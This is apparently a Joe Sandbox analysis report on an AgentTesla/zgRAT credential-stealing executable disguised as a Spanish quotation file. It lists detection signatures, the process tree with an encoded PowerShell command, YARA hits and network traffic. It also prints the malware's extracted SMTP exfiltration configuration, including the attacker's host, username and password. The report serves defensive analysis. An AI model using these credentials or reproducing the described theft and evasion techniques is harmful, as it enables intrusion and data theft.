Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe

Overview

General Information

Sample Name:cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe
Original Sample Name:cotizacin_y_diseos_de_muestra.exe
Analysis ID:830792
MD5:38b3d465545a56ea977ba43dcda97b16
SHA1:e8fc4cb22b0a7e6f24c762b9bd809c8f10a82a84
SHA256:89b5371841e3eb63f290b60717e55ddfc8518803e14419d5c9ad3a6bf111c2c8
Tags:agentteslaexe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe (PID: 5720 cmdline: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe MD5: 38B3D465545A56EA977BA43DCDA97B16)
    • powershell.exe (PID: 4772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Hxpqwdnjsynypvjkzfile.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
    • InstallUtil.exe (PID: 4664 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe MD5: 6EE3F830099ADD53C26DF5739B44D608)
  • explorers.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: 38B3D465545A56EA977BA43DCDA97B16)
    • powershell.exe (PID: 812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
  • KbWSe.exe (PID: 5992 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • explorers.exe (PID: 2220 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: 38B3D465545A56EA977BA43DCDA97B16)
  • KbWSe.exe (PID: 5772 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}
SourceRuleDescriptionAuthorStrings
00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000002.532200083.00000000031DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000010.00000002.545281703.0000027D36BC0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          0000000E.00000002.551519357.000001DC422C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec604ebb60.2.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0x1283e:$s1: file:///
              • 0x1274c:$s2: {11111-22222-10009-11112}
              • 0x127ce:$s3: {11111-22222-50001-00000}
              • 0x104a6:$s4: get_Module
              • 0xf54f:$s5: Reverse
              • 0x1235e:$s6: BlockCopy
              • 0x1234e:$s7: ReadByte
              • 0x12850:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec709bb7c0.5.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                • 0x10a3e:$s1: file:///
                • 0x1094c:$s2: {11111-22222-10009-11112}
                • 0x109ce:$s3: {11111-22222-50001-00000}
                • 0xe6a6:$s4: get_Module
                • 0xd74f:$s5: Reverse
                • 0x1055e:$s6: BlockCopy
                • 0x1054e:$s7: ReadByte
                • 0x10a50:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                13.2.InstallUtil.exe.26e32acd7b8.6.unpackTypical_Malware_String_TransformsDetects typical strings in a reversed or otherwise modified formFlorian Roth (Nextron Systems)
                • 0xa271f:$i2: sserddAcorPteG
                Click to see the 27 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeReversingLabs: Detection: 26%
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeVirustotal: Detection: 24%Perma Link
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeAvira: detection malicious, Label: TR/Spy.Gen8
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeAvira: detection malicious, Label: TR/Spy.Gen8
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeVirustotal: Detection: 62%Perma Link
                Source: C:\Users\user\AppData\Local\explorers.exeReversingLabs: Detection: 26%
                Source: C:\Users\user\AppData\Local\explorers.exeVirustotal: Detection: 24%Perma Link
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeVirustotal: Detection: 62%Perma Link
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\explorers.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeJoe Sandbox ML: detected
                Source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec71d28c48.13.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.7:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Jnubtmqkgfxsxcozqzr.pdb source: InstallUtil.exe, 0000000D.00000002.531950659.0000026E32EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.531950659.0000026E32C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.537485771.0000026E3B1B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmp

                Networking

                barindex
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                Source: Yara matchFile source: 14.2.explorers.exe.1dc422c0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec78c30000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe.1ec70bf7268.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.explorers.exe.27d36bc0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.398943660.000001EC78C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.545281703.0000027D36BC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.551519357.000001DC422C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficTCP traffic: 192.168.2.7:49702 -> 208.91.199.224:587
                Source: global trafficTCP traffic: 192.168.2.7:49706 -> 208.91.199.223:587
                Source: global trafficTCP traffic: 192.168.2.7:49707 -> 208.91.198.143:587
                Source: global trafficTCP traffic: 192.168.2.7:49709 -> 208.91.199.225:587
                Source: global trafficTCP traffic: 192.168.2.7:49702 -> 208.91.199.224:587
                Source: global trafficTCP traffic: 192.168.2.7:49706 -> 208.91.199.223:587
                Source: global trafficTCP traffic: 192.168.2.7:49707 -> 208.91.198.143:587
                Source: global trafficTCP traffic: 192.168.2.7:49709 -> 208.91.199.225:587
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: KbWSe.exe, 0000000F.00000002.544563348.0000000006010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC710C9000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.360418604.000001EC711E1000.00000004.00000800.00020000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.401249607.000001EC78E40000.00000004.08000000.00040000.00000000.sdmp, cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe, 00000000.00000002.354763342.000001EC605B4000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3A8F9000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.536777083.000001DC3AA11000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 0000000E.00000002.552059800.000001DC424D0000.00000004.08000000.00040000.00000000.sdmp, explorers.exe, 0000000E.00000002.533775360.000001DC29DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
